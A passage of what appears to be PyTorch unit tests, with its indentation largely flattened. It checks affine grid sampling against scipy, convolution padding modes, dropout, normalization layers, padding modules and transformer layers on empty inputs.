output_size = output_size2dsq
angle_rad = 0.25 * math.pi * 2
transform_tensor, transform_ary, offset = \
_buildEquivalentAffineTransforms2d(device, input_size, output_size, angle_rad)
scipy_ary = torch.from_numpy(scipy.ndimage.affine_transform(
input_ary[0, 0],
transform_ary,
offset=offset,
output_shape=output_size[2:],
order=1,
mode='nearest',
prefilter=True))
if input_size2dsq == output_size2dsq:
self.assertEqual(scipy_ary.mean(), input_ary.mean())
self.assertEqual(scipy_ary[0, 0], input_ary[0, 0, 0, -1])
self.assertEqual(scipy_ary[0, -1], input_ary[0, 0, -1, -1])
self.assertEqual(scipy_ary[-1, -1], input_ary[0, 0, -1, 0])
self.assertEqual(scipy_ary[-1, 0], input_ary[0, 0, 0, 0])
affine_tensor = torch.nn.functional.affine_grid(
transform_tensor,
torch.Size(output_size),
align_corners=True
)
gridsample_ary = torch.nn.functional.grid_sample(
torch.tensor(input_ary, device=device).to(device),
affine_tensor,
padding_mode='border',
align_corners=True
).to('cpu')
self.assertEqual(scipy_ary.mean(), gridsample_ary.mean())
self.assertEqual(scipy_ary, gridsample_ary.reshape_as(scipy_ary))
@unittest.skipIf((not TEST_NUMPY) or (not TEST_SCIPY) or (scipy.__version__ < '1.0.0'),
"Scipy v1.0 and/or numpy not found")
@tf32_on_and_off(0.005)
def test_affine_2d_rotate45(self, device):
        # scipy before 1.0.0 does not support homogeneous coordinates in
        # scipy.ndimage.affine_transform, so we need to skip.
input_size = [1, 1, 3, 3]
input_ary = np.array(np.zeros(input_size), dtype=np.float32)
input_ary[0, 0, 0, :] = 0.5
input_ary[0, 0, 2, 2] = 1.0
output_size = [1, 1, 3, 3]
angle_rad = 0.125 * math.pi * 2
transform_tensor, transform_ary, offset = \
_buildEquivalentAffineTransforms2d(device, input_size, output_size, angle_rad)
scipy_ary = torch.from_numpy(scipy.ndimage.affine_transform(
input_ary[0, 0],
transform_ary,
offset=offset,
output_shape=output_size[2:],
order=1,
mode='nearest',
prefilter=False))
affine_tensor = torch.nn.functional.affine_grid(
transform_tensor,
torch.Size(output_size),
align_corners=True
)
gridsample_ary = torch.nn.functional.grid_sample(
torch.tensor(input_ary, device=device).to(device),
affine_tensor,
padding_mode='border',
align_corners=True
).to('cpu')
self.assertEqual(scipy_ary, gridsample_ary.reshape_as(scipy_ary))
@unittest.skipIf((not TEST_NUMPY) or (not TEST_SCIPY) or (scipy.__version__ < '1.0.0'),
"Scipy v1.0 and/or numpy not found")
@tf32_on_and_off(0.005)
def test_affine_2d_rotateRandom(self, device):
        # scipy before 1.0.0 does not support homogeneous coordinates in
        # scipy.ndimage.affine_transform, so we need to skip.
for angle_rad, input_size2d, output_size2d in \
itertools.product(angle_rad_(), input_size2d_(), output_size2d_()):
input_size = input_size2d
input_ary = np.array(np.random.random(input_size), dtype=np.float32).round(3)
output_size = output_size2d
input_ary[0, 0, 0, 0] = 2
input_ary[0, 0, 0, -1] = 4
input_ary[0, 0, -1, 0] = 6
input_ary[0, 0, -1, -1] = 8
transform_tensor, transform_ary, grid_ary = \
_buildEquivalentAffineTransforms2d(device, input_size, output_size, angle_rad)
scipy_ary = torch.from_numpy(scipy.ndimage.affine_transform(
input_ary[0, 0],
transform_ary,
output_shape=output_size[2:],
order=1,
mode='nearest',
prefilter=False))
affine_tensor = torch.nn.functional.affine_grid(
transform_tensor,
torch.Size(output_size),
align_corners=True
)
gridsample_ary = torch.nn.functional.grid_sample(
torch.tensor(input_ary, device=device).to(device),
affine_tensor,
padding_mode='border',
align_corners=True
).to('cpu')
affine_tensor = affine_tensor.to('cpu')
for r in range(affine_tensor.size(1)):
for c in range(affine_tensor.size(2)):
grid_out = np.dot(grid_ary, [r, c, 1])
self.assertEqual(affine_tensor[0, r, c], grid_out[:2], exact_dtype=False)
self.assertEqual(scipy_ary, gridsample_ary.reshape_as(scipy_ary))
@unittest.skipIf((not TEST_NUMPY) or (not TEST_SCIPY) or (scipy.__version__ < '1.0.0'),
"Scipy v1.0 and/or numpy not found")
@tf32_on_and_off(0.005)
def test_affine_3d_rotateRandom(self, device):
        # scipy before 1.0.0 does not support homogeneous coordinates in
        # scipy.ndimage.affine_transform, so we need to skip.
for angle_rad, axis_vector, input_size3d, output_size3d in \
itertools.product(angle_rad_(), axis_vector_(), input_size3d_(), output_size3d_()):
input_size = input_size3d
input_ary = np.array(np.random.random(input_size), dtype=np.float32)
output_size = output_size3d
input_ary[0, 0, 0, 0, 0] = 2
input_ary[0, 0, 0, 0, -1] = 3
input_ary[0, 0, 0, -1, 0] = 4
input_ary[0, 0, 0, -1, -1] = 5
input_ary[0, 0, -1, 0, 0] = 6
input_ary[0, 0, -1, 0, -1] = 7
input_ary[0, 0, -1, -1, 0] = 8
input_ary[0, 0, -1, -1, -1] = 9
transform_tensor, transform_ary, grid_ary = \
_buildEquivalentAffineTransforms3d(device, input_size, output_size, angle_rad, axis_vector)
scipy_ary = torch.from_numpy(scipy.ndimage.affine_transform(
input_ary[0, 0],
transform_ary,
output_shape=output_size[2:],
order=1,
mode='nearest',
prefilter=False))
affine_tensor = torch.nn.functional.affine_grid(
transform_tensor,
torch.Size(output_size),
align_corners=True
)
gridsample_ary = torch.nn.functional.grid_sample(
torch.tensor(input_ary, device=device).to(device),
affine_tensor,
padding_mode='border',
align_corners=True
).to('cpu')
affine_tensor = affine_tensor.to('cpu')
for i in range(affine_tensor.size(1)):
for r in range(affine_tensor.size(2)):
for c in range(affine_tensor.size(3)):
grid_out = np.dot(grid_ary, [i, r, c, 1])
self.assertEqual(affine_tensor[0, i, r, c], grid_out[:3], exact_dtype=False)
self.assertEqual(scipy_ary, gridsample_ary.reshape_as(scipy_ary))
def test_conv1d_same_padding(self, device):
# Test padding='same' outputs the correct shape
test_args = [
# in_size
range(50, 55),
# kernel_size
[1, 2, 3, 8],
# dilation
range(1, 4),
# stride
[1],
]
for in_size, k_size, dilation, stride in itertools.product(*test_args):
x = torch.rand(1, 1, in_size, device=device)
y = torch.rand(1, 1, k_size, device=device)
z = F.conv1d(x, y, padding='same', dilation=dilation, stride=stride)
self.assertEqual(z.size(2), int(math.ceil(in_size / stride)))
# Compare F.conv1d padding='same' output against manual padding
# Without strides/dilation
x = torch.rand(1, 1, 12, device=device)
y = torch.rand(1, 1, 3, device=device)
expect = F.conv1d(x, y, padding=1)
actual = F.conv1d(x, y, padding='same')
self.assertEqual(expect, actual)
# With dilation
x = torch.rand(1, 1, 12, device=device)
y = torch.rand(1, 1, 4, device=device)
expect = F.conv1d(x, y, padding=3, dilation=2)
actual = F.conv1d(x, y, padding='same', dilation=2)
self.assertEqual(expect, actual)
# Dilation with asymmetric padding
expect = F.conv1d(x, y, padding=5, dilation=3)[..., 1:]
actual = F.conv1d(x, y, padding='same', dilation=3)
self.assertEqual(expect, actual)
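    # A minimal sketch of the 'same' padding arithmetic the comparisons above
    # rely on (an illustrative reconstruction, not the internal
    # implementation): with stride 1, the total padding is
    # dilation * (kernel_size - 1), split with the extra element on the right,
    # which is why the asymmetric cases slice off one leading output element.
    @staticmethod
    def _same_padding_1d_sketch(kernel_size, dilation=1):
        total = dilation * (kernel_size - 1)
        return total // 2, total - total // 2  # (left, right)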
def test_conv2d_same_padding(self, device):
# Compare F.conv2d padding='same' output against manual padding
# Without strides/dilation
x = torch.rand(1, 1, 10, 11, device=device)
y = torch.rand(1, 1, 4, 5, device=device)
expect = F.conv2d(x, y, padding=(2, 2))[..., 1:, :]
actual = F.conv2d(x, y, padding='same')
self.assertEqual(expect, actual)
# With dilation
y = torch.rand(1, 1, 3, 4, device=device)
expect = F.conv2d(x, y, padding=(2, 3), dilation=2)
actual = F.conv2d(x, y, padding='same', dilation=2)
self.assertEqual(expect, actual)
# Dilation with asymmetric padding
y = torch.rand(1, 1, 4, 4, device=device)
expect = F.conv2d(x, y, padding=5, dilation=3)[..., 1:, 1:]
actual = F.conv2d(x, y, padding='same', dilation=3)
self.assertEqual(expect, actual)
def test_conv3d_same_padding(self, device):
# Compare F.conv3d padding='same' output against manual padding
# Without strides/dilation
x = torch.rand(1, 1, 10, 11, 12, device=device)
y = torch.rand(1, 1, 1, 2, 5, device=device)
expect = F.conv3d(x, y, padding=(0, 1, 2))[..., :, 1:, :]
actual = F.conv3d(x, y, padding='same')
self.assertEqual(expect, actual)
# With dilation
expect = F.conv3d(x, y, padding=(0, 1, 4), dilation=2)
actual = F.conv3d(x, y, padding='same', dilation=2)
self.assertEqual(expect, actual)
# Dilation with asymmetric padding
y = torch.rand(1, 1, 4, 4, 4, device=device)
expect = F.conv3d(x, y, padding=5, dilation=3)[..., 1:, 1:, 1:]
actual = F.conv3d(x, y, padding='same', dilation=3)
self.assertEqual(expect, actual)
def test_conv1d_valid_padding(self, device):
# Test F.conv1d padding='valid' is the same as no padding
x = torch.rand(1, 1, 10, device=device)
y = torch.rand(1, 1, 4, device=device)
expect = F.conv1d(x, y)
actual = F.conv1d(x, y, padding='valid')
self.assertEqual(expect, actual)
def test_conv2d_valid_padding(self, device):
# Test F.conv2d padding='valid' is the same as no padding
x = torch.rand(1, 1, 1, 10, device=device)
y = torch.rand(1, 1, 1, 4, device=device)
expect = F.conv2d(x, y)
actual = F.conv2d(x, y, padding='valid')
self.assertEqual(expect, actual)
def test_conv3d_valid_padding(self, device):
# Test F.conv3d padding='valid' is the same as no padding
x = torch.rand(1, 1, 1, 1, 10, device=device)
y = torch.rand(1, 1, 1, 1, 4, device=device)
expect = F.conv3d(x, y)
actual = F.conv3d(x, y, padding='valid')
self.assertEqual(expect, actual)
def test_conv1d_same_padding_backward(self, device):
# Test F.conv1d gradients work with padding='same'
x = torch.rand(1, 1, 12, device=device, requires_grad=True)
y = torch.rand(1, 1, 4, device=device, requires_grad=True)
# Symmetric padding
z = F.conv1d(x, y, padding=3, dilation=2)
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
z = F.conv1d(x, y, padding='same', dilation=2)
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
x.grad, y.grad = None, None
# Asymmetric padding
z = F.conv1d(x, y, padding=2)[..., 1:]
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
z = F.conv1d(x, y, padding='same')
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
def test_conv2d_same_padding_backward(self, device):
# Test F.conv2d gradients work with padding='same'
x = torch.rand(1, 1, 10, 11, device=device, requires_grad=True)
y = torch.rand(1, 1, 4, 5, device=device, requires_grad=True)
# Symmetric padding
z = F.conv2d(x, y, padding=(3, 4), dilation=2)
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
z = F.conv2d(x, y, padding='same', dilation=2)
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
x.grad, y.grad = None, None
# Asymmetric padding
y = torch.rand(1, 1, 4, 4, device=device, requires_grad=True)
z = F.conv2d(x, y, padding=2)[..., 1:, 1:]
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
        z = F.conv2d(x, y, padding='same')
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
def test_conv3d_same_padding_backward(self, device):
# Test F.conv3d gradients work with padding='same'
x = torch.rand(1, 1, 1, 11, 12, device=device, requires_grad=True)
y = torch.rand(1, 1, 1, 2, 5, device=device, requires_grad=True)
# Symmetric padding
z = F.conv3d(x, y, padding=(0, 1, 4), dilation=2)
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
z = F.conv3d(x, y, padding='same', dilation=2)
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
x.grad, y.grad = None, None
# Asymmetric padding
y = torch.rand(1, 1, 1, 4, 4, device=device, requires_grad=True)
z = F.conv3d(x, y, padding=2)[..., 1:, 1:]
z.sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
z = F.conv3d(x, y, padding='same')
z.sum().backward()
self.assertEqual(gx_expect, x.grad)
self.assertEqual(gy_expect, y.grad)
def test_conv1d_valid_padding_backward(self, device):
# Test F.conv1d gradients work with padding='valid'
x = torch.rand(1, 1, 10, device=device, requires_grad=True)
y = torch.rand(1, 1, 4, device=device, requires_grad=True)
F.conv1d(x, y, padding=0).sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
F.conv1d(x, y, padding='valid').sum().backward()
gx_actual, gy_actual = x.grad, y.grad
self.assertEqual(gx_expect, gx_actual)
self.assertEqual(gy_expect, gy_actual)
def test_conv2d_valid_padding_backward(self, device):
# Test F.conv2d gradients work with padding='valid'
x = torch.rand(1, 1, 1, 10, device=device, requires_grad=True)
y = torch.rand(1, 1, 1, 4, device=device, requires_grad=True)
F.conv2d(x, y, padding=0).sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
F.conv2d(x, y, padding='valid').sum().backward()
gx_actual, gy_actual = x.grad, y.grad
self.assertEqual(gx_expect, gx_actual)
self.assertEqual(gy_expect, gy_actual)
def test_conv3d_valid_padding_backward(self, device):
# Test F.conv3d gradients work with padding='valid'
x = torch.rand(1, 1, 1, 1, 10, device=device, requires_grad=True)
y = torch.rand(1, 1, 1, 1, 4, device=device, requires_grad=True)
F.conv3d(x, y, padding=0).sum().backward()
gx_expect, gy_expect = x.grad, y.grad
x.grad, y.grad = None, None
F.conv3d(x, y, padding='valid').sum().backward()
gx_actual, gy_actual = x.grad, y.grad
self.assertEqual(gx_expect, gx_actual)
self.assertEqual(gy_expect, gy_actual)
def test_Dropout(self, device):
input = torch.empty(1000)
self._test_dropout(nn.Dropout, device, input)
self._test_dropout_discontiguous(nn.Dropout, device)
self._test_dropout_discontiguous(nn.Dropout, device, memory_format=torch.channels_last)
self._test_dropout_stride_mean_preserve(nn.Dropout, device)
        if self.device_type in ('cuda', 'cpu'):
input = input.bfloat16()
self._test_dropout(nn.Dropout, device, input)
def test_Dropout2d(self, device):
b = random.randint(1, 5)
w = random.randint(1, 5)
h = random.randint(1, 5)
num_features = 1000
input = torch.empty(num_features, b, w, h)
self._test_dropout(nn.Dropout2d, device, input)
self._test_dropout(nn.Dropout2d, device, input, memory_format=torch.channels_last)
self._test_dropout_discontiguous(nn.Dropout2d, device)
self._test_dropout_discontiguous(nn.Dropout2d, device, memory_format=torch.channels_last)
# no batch dims
input = torch.empty(20, 64, 64)
self._test_dropout(nn.Dropout2d, device, input)
def test_Dropout3d(self, device):
b = random.randint(1, 5)
w = random.randint(1, 5)
h = random.randint(1, 5)
d = random.randint(1, 2)
num_features = 1000
input = torch.empty(num_features, b, d, w, h)
self._test_dropout(nn.Dropout3d, device, input)
self._test_dropout_discontiguous(nn.Dropout3d, device)
self._test_dropout_discontiguous(nn.Dropout3d, device, memory_format=torch.channels_last)
# no batch dims
input = torch.empty(50, 20, 64, 64)
self._test_dropout(nn.Dropout3d, device, input)
def test_InstanceNorm1d_general(self, device):
b = random.randint(3, 5)
c = random.randint(3, 5)
d = random.randint(8, 10)
input = torch.rand(b, c, d)
self._test_InstanceNorm_general(nn.InstanceNorm1d, input, device)
if self.device_type == 'cuda':
self._test_InstanceNorm_cuda_half(nn.InstanceNorm1d, input, device)
def test_InstanceNorm2d_general(self, device):
b = random.randint(3, 5)
c = random.randint(3, 5)
w = random.randint(3, 6)
h = random.randint(6, 8)
input = torch.rand(b, c, h, w)
self._test_InstanceNorm_general(nn.InstanceNorm2d, input, device)
if self.device_type == 'cuda':
self._test_InstanceNorm_cuda_half(nn.InstanceNorm2d, input, device)
def test_InstanceNorm3d_general(self, device):
b = random.randint(3, 5)
c = random.randint(3, 5)
w = random.randint(2, 5)
h = random.randint(2, 5)
d = random.randint(2, 5)
input = torch.rand(b, c, h, w, d)
self._test_InstanceNorm_general(nn.InstanceNorm3d, input, device)
if self.device_type == 'cuda':
self._test_InstanceNorm_cuda_half(nn.InstanceNorm3d, input, device)
def test_instancenorm_raises_error_if_less_than_one_value_per_channel(self, device):
x = torch.rand(10)[None, :, None]
with self.assertRaises(ValueError):
torch.nn.InstanceNorm1d(10)(x).to(device)
def test_instancenorm_raises_error_for_single_spatial_element_during_training(self, device):
BATCH_SIZE = 10
NUM_CHANNELS = 3
norms = [torch.nn.InstanceNorm1d, torch.nn.InstanceNorm2d, torch.nn.InstanceNorm3d]
for i, norm in enumerate(norms):
m = norm(NUM_CHANNELS, track_running_stats=True)
m.to(device)
# Create an appropriately-sized input with a single spatial element.
input = torch.randn(BATCH_SIZE, NUM_CHANNELS, *[1 for _ in range(i + 1)],
device=device)
with self.assertRaises(ValueError):
m(input)
# Single spatial element should be fine in eval.
m.eval()
m(input)
def test_LayerNorm_general(self, device):
self._test_LayerNorm_general(device)
        if self.device_type in ('cuda', 'cpu'):
self._test_LayerNorm_general(device, dtype=torch.bfloat16)
if self.device_type == 'cuda':
self._test_LayerNorm_cuda_half(device)
@onlyOnCPUAndCUDA
def test_LayerNorm_numeric(self, device):
def layer_norm_ref(X, gamma, beta, normalized_shape, eps):
feature_size = np.prod(normalized_shape)
X_view = X.view(-1, feature_size)
mean = X_view.mean(dim=-1, keepdim=True)
var = X_view.var(dim=-1, unbiased=False, keepdim=True)
Y = (X_view - mean) / torch.sqrt(var + eps)
Y = Y * gamma.view(-1) + beta.view(-1)
return Y.view(*X.size())
normalized_shape = [256, 256, 144]
layer_norm = nn.LayerNorm(normalized_shape).float().to(device)
X = torch.rand(2, *normalized_shape, dtype=torch.float32,
device=device)
Y = layer_norm(X)
Y_ref = layer_norm_ref(X, layer_norm.weight.data, layer_norm.bias.data,
normalized_shape, layer_norm.eps)
self.assertEqual(Y, Y_ref, rtol=0, atol=1e-5)
if self.device_type == 'cuda':
layer_norm.cpu()
Y_cpu = layer_norm(X.cpu())
self.assertEqual(Y_cpu, Y, rtol=0, atol=1e-5)
@onlyOnCPUAndCUDA
def test_GroupNorm_general(self, device):
self._test_GroupNorm_general(device)
if self.device_type == 'cuda':
self._test_GroupNorm_cuda_half()
def test_GroupNorm_raises_error_if_one_value_per_group(self, device):
x = torch.rand(10)[None, :, None]
with self.assertRaises(ValueError):
torch.nn.GroupNorm(10, 10)(x).to(device)
def test_GroupNorm_empty(self, device):
mod = torch.nn.GroupNorm(2, 4).to(device)
inp = torch.randn(0, 4, 2, 2, device=device)
self._test_module_empty_input(mod, inp)
if self.device_type == 'cuda' and self.has_cudnn():
with torch.backends.cudnn.flags(enabled=False):
self._test_module_empty_input(mod, inp)
@onlyCPU
@dtypes(torch.float, torch.double)
def test_groupnorm_nhwc(self, device, dtype):
def helper(self, size, groups):
channels = size[1]
input = torch.randn(size, dtype=dtype, device=device, requires_grad=True)
input = input.contiguous(memory_format=torch.channels_last)
input.retain_grad()
grad = torch.randn(size, dtype=dtype, device=device)
grad = grad.contiguous(memory_format=torch.channels_last)
gn = nn.GroupNorm(groups, channels).to(device).to(dtype)
gn.weight.data.uniform_()
gn.bias.data.uniform_()
ref_input = input.detach().clone().contiguous().requires_grad_(True)
ref_grad = grad.detach().clone().contiguous()
ref_gn = nn.GroupNorm(groups, channels).to(device).to(dtype)
ref_gn.load_state_dict(gn.state_dict())
out = gn(input)
out.backward(grad)
ref_out = ref_gn(ref_input)
ref_out.backward(ref_grad)
self.assertTrue(out.is_contiguous(memory_format=torch.channels_last))
self.assertTrue(ref_out.is_contiguous())
self.assertEqual(out, ref_out)
self.assertEqual(gn.weight.grad, ref_gn.weight.grad)
self.assertEqual(gn.bias.grad, ref_gn.bias.grad)
self.assertEqual(input.grad, ref_input.grad)
helper(self, (4, 8, 10, 10), 4)
helper(self, (2, 30, 9, 9), 3)
@onlyOnCPUAndCUDA
def test_GroupNorm_numeric(self, device):
def group_norm_ref(X, gamma, beta, groups, channels, eps):
batch_size = X.size()[0]
X_view = X.view(batch_size, groups, -1)
mean = X_view.mean(dim=-1, keepdim=True)
var = X_view.var(dim=-1, unbiased=False, keepdim=True)
Y = ((X_view - mean) / torch.sqrt(var + eps)).view(
batch_size, channels, -1)
Y = Y * gamma.view(channels, 1) + beta.view(channels, 1)
return Y.view(*X.size())
batch_size = 1
groups = 2
channels = 8
group_norm = nn.GroupNorm(groups, channels).float().to(device)
X = torch.rand(batch_size, channels, 256, 256, 72,
dtype=torch.float32, device=device)
Y = group_norm(X)
Y_ref = group_norm_ref(
X, group_norm.weight.data, group_norm.bias.data, groups,
channels, group_norm.eps)
self.assertEqual(Y, Y_ref, rtol=0, atol=1e-5)
if self.device_type == 'cuda':
group_norm.cpu()
Y_cpu = group_norm(X.cpu())
self.assertEqual(Y_cpu, Y, rtol=0, atol=1e-5)
@onlyOnCPUAndCUDA
@dtypes(torch.float64, torch.complex128)
def test_pad(self, device, dtype):
# Assert assertion errors are raised for invalid circular padding values
inputs = torch.randn(1, 1, 4, device=device, dtype=dtype, requires_grad=True)
# Should raise error when trying to wrap around more than once
self.assertRaises(AssertionError, lambda: F.pad(inputs, (5, 4), mode='circular'))
self.assertRaises(AssertionError, lambda: F.pad(inputs, (3, 6), mode='circular'))
# Should raise error when negative padding results in negative output shape
self.assertRaises(AssertionError, lambda: F.pad(inputs, (-3, -2), mode='circular'))
        # assert that reflection padding errors when pad >= input size
expected_err_msg = r"Padding size should be less than the corresponding input dimension"
inputs = torch.randn(1, 1, 2, 3, device=device, dtype=dtype)
self.assertRaisesRegex(RuntimeError, expected_err_msg,
lambda: F.pad(inputs, (1, 1, 3, 0), mode='reflect'))
inputs = torch.randn(1, 1, 2, device=device, dtype=dtype)
self.assertRaisesRegex(RuntimeError, expected_err_msg,
lambda: F.pad(inputs, (2, 1), mode='reflect'))
inputs = torch.rand(1, 3, 4, 4, device=device, dtype=dtype)
# assert that pad doesn't return a view into the input tensor
for mode in 'constant', 'reflect', 'replicate', 'circular':
out = F.pad(inputs, (0, 0, 0, 0), mode=mode)
out.fill_(4)
self.assertTrue(torch.all(torch.abs(inputs) < 2))
out = F.pad(inputs, (0, 0, -1, -1), mode=mode)
out.fill_(4)
self.assertTrue(torch.all(torch.abs(inputs) < 2))
@onlyOnCPUAndCUDA
@dtypes(torch.float64, torch.complex128)
def test_ReplicationPad_empty(self, device, dtype):
for mod, inp in [
(torch.nn.ReplicationPad1d(3), torch.randn(0, 3, 10, device=device, dtype=dtype)),
(torch.nn.ReplicationPad2d(3), torch.randn(0, 3, 10, 10, device=device, dtype=dtype)),
(torch.nn.ReplicationPad3d(3), torch.randn(0, 3, 10, 10, 10, device=device, dtype=dtype))]:
self._test_module_empty_input(mod, inp, check_size=False)
with self.assertRaisesRegex(RuntimeError, 'Expected 2D or 3D'):
mod = torch.nn.ReplicationPad1d(2)
inp = torch.randn(3, 0, 10, device=device, dtype=dtype)
mod(inp)
with self.assertRaisesRegex(RuntimeError, 'Expected 3D or 4D'):
mod = torch.nn.ReplicationPad2d((2, 2, 2, 2))
inp = torch.randn(43, 0, 10, 10, device=device, dtype=dtype)
mod(inp)
with self.assertRaisesRegex(RuntimeError, 'Expected 4D or 5D'):
mod = torch.nn.ReplicationPad3d((2, 2, 2, 2, 2, 2))
inp = torch.randn(3, 0, 10, 10, 10, device=device, dtype=dtype)
mod(inp)
def test_ReplicationPad1d_large(self, device):
shapes = ([2, 65736, 4], [65736, 2, 4])
pl, pr = 3, 4
for shape in shapes:
x = torch.randn(shape, device=device, requires_grad=True)
model = torch.nn.ReplicationPad1d((pl, pr))
# forward
out = model(x)
self.assertEqual(out[:, :, pl : -pr], x)
left_padding = out[:, :, : pl]
self.assertEqual(left_padding, x[:, :, :1].expand_as(left_padding))
right_padding = out[:, :, -pr :]
self.assertEqual(right_padding, x[:, :, -1:].expand_as(right_padding))
# backward
g = torch.randn_like(out)
out.backward(g)
self.assertEqual(x.grad[:, :, 1 : -1], g[:, :, pl + 1 : -pr - 1])
self.assertEqual(x.grad[:, :, 0], g[:, :, : pl + 1].sum(-1))
self.assertEqual(x.grad[:, :, -1], g[:, :, -pr - 1:].sum(-1))
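    # Note (inferred from the backward assertions above): every replicated pad
    # element is a copy of its boundary element, so in backward all of the pad
    # gradients accumulate (sum) back onto that single boundary element.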
def test_ReplicationPad2d_large(self, device):
shapes = ([2, 65736, 4, 4], [65736, 2, 4, 4])
pl, pr, pt, pb = 3, 4, 5, 6
for shape in shapes:
x = torch.randn(shape, device=device, requires_grad=True)
model = torch.nn.ReplicationPad2d((pl, pr, pt, pb))
# forward center, edge
out = model(x)
self.assertEqual(out[:, :, pt : -pb, pl : -pr], x)
left_padding = out[:, :, pt : -pb, : pl]
self.assertEqual(left_padding, x[:, :, :, :1].expand_as(left_padding))
right_padding = out[:, :, pt : -pb, -pr :]
self.assertEqual(right_padding, x[:, :, :, -1:].expand_as(right_padding))
top_padding = out[:, :, : pt, pl : -pr]
self.assertEqual(top_padding, x[:, :, :1, :].expand_as(top_padding))
bottom_padding = out[:, :, -pb : , pl : -pr]
self.assertEqual(bottom_padding, x[:, :, -1:, :].expand_as(bottom_padding))
# forward corner
tl_padding = out[:, :, : pt + 1, : pl + 1]
self.assertEqual(tl_padding, x[:, :, :1, :1].expand_as(tl_padding))
tr_padding = out[:, :, : pt + 1, -pr - 1:]
self.assertEqual(tr_padding, x[:, :, :1, -1:].expand_as(tr_padding))
bl_padding = out[:, :, -pb - 1:, : pl + 1]
self.assertEqual(bl_padding, x[:, :, -1:, :1].expand_as(bl_padding))
br_padding = out[:, :, -pb - 1:, -pr - 1:]
self.assertEqual(br_padding, x[:, :, -1:, -1:].expand_as(br_padding))
# backward center, edge
g = torch.randn_like(out)
out.backward(g)
self.assertEqual(x.grad[:, :, 1:-1, 1:-1], g[:, :, pt + 1 : -pb - 1, pl + 1 : -pr - 1])
self.assertEqual(x.grad[:, :, 1:-1, 0], g[:, :, pt + 1 : -pb - 1, : pl + 1].sum(-1))
self.assertEqual(x.grad[:, :, 1:-1, -1], g[:, :, pt + 1 : -pb - 1, -pr - 1 :].sum(-1))
self.assertEqual(x.grad[:, :, 0, 1:-1], g[:, :, : pt + 1, pl + 1 : -pr - 1].sum(-2))
self.assertEqual(x.grad[:, :, -1, 1:-1], g[:, :, -pb - 1 :, pl + 1 : -pr - 1].sum(-2))
# backward corner
self.assertEqual(x.grad[:, :, 0, 0], g[:, :, : pt + 1, : pl + 1].sum((-2, -1)))
self.assertEqual(x.grad[:, :, 0, -1], g[:, :, : pt + 1, -pr - 1 :].sum((-2, -1)))
self.assertEqual(x.grad[:, :, -1, 0], g[:, :, -pb - 1 :, : pl + 1].sum((-2, -1)))
self.assertEqual(x.grad[:, :, -1, -1], g[:, :, -pb - 1 :, -pr - 1 :].sum((-2, -1)))
@largeTensorTest("6GB")
def test_ReplicationPad3d_large(self, device):
shapes = ([1, 65736, 2, 2, 2], [65736, 1, 2, 2, 2])
pl, pr, pt, pbt, pf, pbk = 3, 4, 5, 6, 7, 8
for shape in shapes:
x = torch.randn(shape, device=device, requires_grad=True)
model = torch.nn.ReplicationPad3d((pl, pr, pt, pbt, pf, pbk))
# forward center
out = model(x)
self.assertEqual(out[:, :, pf : -pbk, pt : -pbt, pl : -pr], x)
# backward center
g = torch.randn_like(out)
out.backward(g)
self.assertEqual(x.grad[:, :, 1:-1, 1:-1, 1:-1], g[:, :, pf + 1 : -pbk - 1, pt + 1 : -pbt - 1, pl + 1 : -pr - 1])
@onlyOnCPUAndCUDA
def test_Bilinear_empty(self, device):
mod = torch.nn.Bilinear(20, 30, 40).to(device)
inp1 = torch.randn(0, 10, 20, requires_grad=True, device=device)
inp2 = torch.randn(0, 10, 30, requires_grad=True, device=device)
output = mod(inp1, inp2)
output.sum().backward()
self.assertEqual(inp1, torch.zeros_like(inp1))
self.assertEqual(inp2, torch.zeros_like(inp2))
self.assertEqual(inp1.grad, torch.zeros_like(inp1))
self.assertEqual(inp2.grad, torch.zeros_like(inp2))
@onlyOnCPUAndCUDA
def test_TransformerEncoderLayer_empty(self, device):
for batch_first, input_shape in [(True, (0, 10, 512)),
(False, (10, 0, 512))]:
input = torch.rand(*input_shape, device=device)
encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8, batch_first=batch_first).to(device)
self._test_module_empty_input(encoder_layer, input, check_size=False)
@onlyOnCPUAndCUDA
def test_TransformerEncoder_empty(self, device):
for batch_first, input_shape in [(True, (0, 10, 512)),
(False, (10, 0, 512))]:
input = torch.rand(*input_shape, device=device)
encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8, batch_first=batch_first).to(device)
transformer_encoder = nn.TransformerEncoder(encoder_layer, num_layers=6).to(device)
self._test_module_empty_input(transformer_encoder, input, check_size=False)
@onlyOnCPUAndCUDA
def test_TransformerDecoderLayer_empty(self, device):
for batch_first, memory_shape, tgt_shape in [(True, (0, 10, 512), (0, 20, 512)),
(False, (10, 0, 512), (20, 0, 512))]:
memory = torch.rand(*memory_shape, device=device)
tgt = torch.rand(*tgt_shape, requires_grad=True, device=device)
decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8, batch_first=batch_first).to(device)
self._test_module_empty_inputs(decoder_layer, [tgt, memory])
@onlyOnCPUAndCUDA
def test_TransformerDecoder_empty(self, device):
for batch_first, memory_shape, tgt_shape in [(True, (0, 10, 512), (0, 20, 512)),
(False, (10, 0, 512), (20, 0, 512))]:
memory = torch.rand(*memory_shape, device=device)
tgt = torch.rand(*tgt_shape, requires_grad=True, device=device)
decoder_layer = nn.TransformerDecoderLayer(d_model=512, nhead=8, batch_first=batch_first).to(device)
transformer_decoder = nn.TransformerDecoder(decoder_layer, num_layers=6).to(device)
self._test_module_empty_inputs(transformer_decoder, [tgt, memory])
